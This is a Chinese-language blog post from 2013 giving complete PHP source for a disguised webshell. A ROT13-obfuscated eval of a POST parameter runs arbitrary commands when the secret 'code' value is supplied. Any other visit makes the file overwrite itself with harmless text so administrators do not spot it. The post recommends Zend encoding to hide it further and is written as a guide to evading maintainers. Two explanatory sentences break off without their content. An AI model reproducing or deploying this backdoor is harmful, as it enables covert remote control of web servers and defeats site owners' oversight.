MENU

自毁的PHP文件—脚本木马伪装思路

December 15, 2013 • phpcode

首先用zend把代码加密起来。

一般情况下,遇到陌生的php都会打开看看,一看是zend就会在浏览器访问下,这样的话,直接往当前文件写入一个正常的文字不会被维护人员发觉!!<!--more-->

<?
if($_REQUEST["code"]==pany){
eval(str_rot13('riny($_CBFG[pzq]);'));
}
else{
$url = $_SERVER['PHP_SELF'];
$filename = end(explode('/',$url));

$content = 'helloworld';
$fp = fopen ("$filename","w");
    if (fwrite ($fp, $content)){
        fclose ($fp);
        die ("error");
    } else {
        fclose ($fp);
        die ("good");
    }
exit;
}
?>

自己访问的时候 http://127.0.0.1/1.php?code=pany 时,执行的是

if($_REQUEST["code"]==pany){
eval(str_rot13('riny($_CBFG[pzq]);'));
}

在这里我填写的是一句话木马,你可以换成其他内容。

管理员直接访问http://127.0.0.1/1.php 会出现

此时源代码变成

思路来自乌云社区的juuxdd

Archives QR Code
QR Code for this page
Tipping QR Code